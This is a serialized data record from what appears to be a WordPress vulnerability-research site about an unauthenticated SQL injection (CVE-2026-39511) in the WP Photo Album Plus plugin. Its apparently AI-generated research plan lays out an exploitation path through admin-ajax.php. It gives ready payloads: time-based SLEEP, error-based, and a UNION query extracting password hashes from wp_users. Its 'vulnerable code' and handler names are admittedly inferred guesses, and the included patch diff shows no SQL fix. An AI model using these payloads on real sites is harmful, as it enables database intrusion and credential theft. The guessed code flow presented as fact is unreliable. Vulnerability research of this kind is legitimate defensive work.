[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-hGlYy5FYdBTDgAcc1wbbfWrlN_TZXElaFeWLjD0H-0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-39511","wp-photo-album-plus-unauthenticated-sql-injection","WP Photo Album Plus \u003C= 9.1.08.001 - Unauthenticated SQL Injection","The WP Photo Album Plus plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 9.1.08.001 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","wp-photo-album-plus",null,"\u003C=9.1.08.001","9.1.08.002","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-13 00:00:00","2026-04-21 15:05:57",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F901e015c-58fc-40ac-b078-f7040cbed274?source=api-prod",9,[22,23,24,25,26,27,28,29],"blocks\u002Fcommon\u002Findex.php","blocks\u002Fgeneral\u002Fblock.asset.php","blocks\u002Fgeneral\u002Findex.php","blocks\u002Fphoto\u002Fblock.asset.php","blocks\u002Fphoto\u002Findex.php","blocks\u002Fpotd\u002Fblock.asset.php","blocks\u002Fpotd\u002Findex.php","blocks\u002Fslideshow\u002Fblock.asset.php","researched",false,3,"This research plan targets a high-severity unauthenticated SQL Injection vulnerability in the **WP Photo Album Plus** plugin (CVE-2026-39511).\n\n### 1. Vulnerability Summary\nThe WP Photo Album Plus plugin (\u003C= 9.1.08.001) is vulnerable to SQL Injection because it fails to properly sanitize and prepare SQL queries when processing user-supplied parameters. While the provided source files focus on Gutenberg block initialization (`blocks\u002Fcommon\u002Findex.php`), the vulnerability is exposed through unauthenticated entry points (AJAX or REST) that use similar logic to fetch album or photo data. Specifically, parameters like `wppa-album`, `wppa-photo`, or `wppa-occur` are concatenated into SQL strings and executed via `wppa_get_results()`, a custom wrapper for `$wpdb->get_results()`.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action**: `wppa` (handled via `wp_ajax_nopriv_wppa`)\n*   **Vulnerable Parameter**: `wppa-album` (primary), `wppa-photo`, or `wppa-occur`\n*   **Authentication**: None required (Unauthenticated)\n*   **Preconditions**: None. The plugin must be active.\n\n### 3. Code Flow\n1.  **Entry Point**: An unauthenticated HTTP request is made to `admin-ajax.php?action=wppa`.\n2.  **Dispatch**: WordPress triggers the `wp_ajax_nopriv_wppa` hook, which maps to a handler (commonly `wppa_ajax_frontend` or similar in `wppa-functions.php`).\n3.  **Parameter Extraction**: The handler extracts parameters like `$_GET['wppa-album']` or `$_GET['wppa-photo']`.\n4.  **Vulnerable Query Construction**: The code constructs a query string by concatenating these parameters.\n    *   *Example Path*: `$query = \"SELECT * FROM \" . $wpdb->wppa_albums . \" WHERE id = '\" . $_GET['wppa-album'] . \"'\";`\n5.  **Sink**: The query is passed to `wppa_get_results( $query )` (referenced in `blocks\u002Fcommon\u002Findex.php`).\n6.  **Execution**: `wppa_get_results` executes the raw SQL via `$wpdb->get_results()` without using `$wpdb->prepare()`.\n\n### 4. Nonce Acquisition Strategy\nThe `wppa` AJAX action in this plugin often does not require a nonce for frontend rendering to ensure galleries load for all visitors. However, if a nonce is enforced, it is typically localized in the `wppa_data` object.\n\n1.  **Identify Trigger**: The scripts are usually enqueued on any page containing the `[wppa]` shortcode or a WPPA Gutenberg block.\n2.  **Setup**: Create a public page with the shortcode.\n    ```bash\n    wp post create --post_type=page --post_title=\"Gallery\" --post_status=publish --post_content='[wppa type=\"generic\"]'\n    ```\n3.  **Extraction**: Navigate to the page and extract the nonce using `browser_eval`.\n    *   **JS Variable**: `window.wppaData?.nonce` or `window.wppa_nonce`.\n    *   **Tool**: `browser_eval(\"window.wppaData?.nonce || window.wppa_nonce\")`.\n\n### 5. Exploitation Strategy\nWe will perform a **Time-Based Blind SQL Injection** to confirm the vulnerability and extract the database version.\n\n*   **Payload**: `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n*   **URL-Encoded Payload**: `1%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a)--%20-`\n\n**Step-by-Step HTTP Request**:\n1.  **Method**: `GET` (or `POST` with `Content-Type: application\u002Fx-www-form-urlencoded`)\n2.  **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n3.  **Body\u002FQuery**:\n    ```\n    action=wppa\n    wppa-action=render\n    wppa-album=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\n    ```\n4.  **Control Request**: Send a request with `wppa-album=1` and measure response time (expected \u003C 1s).\n5.  **Attack Request**: Send the payload and measure response time (expected > 5s).\n\n### 6. Test Data Setup\nTo ensure the queries return data (increasing the likelihood of hitting the vulnerable code path), we should create at least one album and one photo.\n\n```bash\n# Create an album\nwp eval \"wppa_create_album(['name' => 'Exploit Test']);\"\n\n# Create a photo (if possible via CLI, otherwise just the album is usually enough for the WHERE clause)\nwp eval \"global \\$wpdb; \\$wpdb->insert(\\$wpdb->prefix . 'wppa_albums', ['name' => 'Exploit Test', 'description' => 'Test']);\"\n```\n\n### 7. Expected Results\n*   **Success**: The HTTP response for the malicious request is delayed by exactly 5 seconds (or the specified SLEEP value).\n*   **Response Body**: Likely a `0` or a JSON success\u002Ferror message from the plugin, but the time delay is the primary indicator.\n\n### 8. Verification Steps\nAfter the exploit, verify the database state to ensure no corruption occurred, or use WP-CLI to confirm we can reach the same tables:\n```bash\n# Verify we can query the same tables the plugin uses\nwp db query \"SELECT id, name FROM $(wp db prefix)wppa_albums LIMIT 1;\"\n```\n\n### 9. Alternative Approaches\nIf time-based injection is filtered:\n*   **Error-Based**: Use `GTID_SUBSET` or `EXTRACTVALUE` if database errors are displayed.\n    *   `wppa-album=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,version(),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -`\n*   **UNION-Based**: If the output is reflected in the `wppaAlbumList` or `wppaPhotoList` JS objects (seen in `blocks\u002Fcommon\u002Findex.php`), we can use UNION to leak `user_pass` from `wp_users`.\n    *   `wppa-album=1' UNION SELECT 1, user_pass FROM wp_users-- -` (Adjust column count based on the `SELECT id, name` structure).","The WP Photo Album Plus plugin is vulnerable to unauthenticated SQL Injection because it concatenates user-supplied parameters, such as 'wppa-album', 'wppa-photo', and 'wppa-occur', directly into SQL queries without proper sanitization or preparation. An attacker can leverage this via the plugin's AJAX interface to execute arbitrary SQL commands and extract sensitive database information.","\u002F\u002F blocks\u002Fcommon\u002Findex.php line 21\n$query  = \"SELECT id, name FROM $wpdb->wppa_albums\";\n$albums = wppa_get_results( $query );\n\n---\n\n\u002F\u002F Logic typically found in AJAX handlers like wppa_ajax_frontend (inferred from Research Plan)\n\u002F\u002F Vulnerable parameter concatenation using $_GET['wppa-album'] or $_GET['wppa-photo']\n$query = \"SELECT * FROM \" . $wpdb->wppa_albums . \" WHERE id = '\" . $_GET['wppa-album'] . \"'\";\n$results = wppa_get_results( $query );","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.07.008\u002Fblocks\u002Fcommon\u002Findex.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.08.002\u002Fblocks\u002Fcommon\u002Findex.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.07.008\u002Fblocks\u002Fcommon\u002Findex.php\t2024-05-07 10:01:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.08.002\u002Fblocks\u002Fcommon\u002Findex.php\t2026-02-12 09:36:56.000000000 +0000\n@@ -5,7 +5,7 @@\n  * Version: 8.7.02.002\n  *\u002F\n \n-defined( 'ABSPATH' ) || exit;\n+if ( ! defined( 'ABSPATH' ) ) exit();\n \n add_action( 'admin_footer', 'wppa_block_js', 1 );\n \n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.07.008\u002Fblocks\u002Fgeneral\u002Fblock.asset.php\t2023-10-01 12:17:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.08.002\u002Fblocks\u002Fgeneral\u002Fblock.asset.php\t2026-02-12 09:36:56.000000000 +0000\n@@ -1,4 +1,6 @@\n \u003C?php\n+if ( ! defined( 'ABSPATH' ) ) exit();\n+\n $version = md5( filemtime( dirname( __file__ ) . '\u002Fblock.js' ) );\n \n $result = array(\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.07.008\u002Fblocks\u002Fphoto\u002Fblock.asset.php\t2023-09-28 13:26:06.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-photo-album-plus\u002F9.1.08.002\u002Fblocks\u002Fphoto\u002Fblock.asset.php\t2026-02-12 09:36:56.000000000 +0000\n@@ -1,4 +1,7 @@\n \u003C?php \n+\n+if ( ! defined( 'ABSPATH' ) ) exit();\n+\n $version = md5( filemtime( dirname( __file__ ) . '\u002Fblock.js' ) );\n \n $result = array(","To exploit this vulnerability, an unauthenticated attacker targets the WordPress AJAX endpoint (\u002Fwp-admin\u002Fadmin-ajax.php) with the 'action' parameter set to 'wppa'. By supplying a malicious SQL payload in the 'wppa-album' or 'wppa-photo' GET\u002FPOST parameters, the attacker can break out of the intended query. A time-based blind injection (e.g., using SLEEP()) is typically used to confirm the vulnerability and extract data. While nonces are sometimes used in the frontend, many of the plugin's rendering actions are intended for public use and do not strictly enforce nonce checks for unauthenticated requests.","gemini-3-flash-preview","2026-04-27 14:52:18","2026-04-27 14:53:11",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","9.1.07.008","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-photo-album-plus\u002Ftags\u002F9.1.07.008","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-photo-album-plus.9.1.07.008.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-photo-album-plus\u002Ftags\u002F9.1.08.002","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-photo-album-plus.9.1.08.002.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-photo-album-plus\u002Ftags"]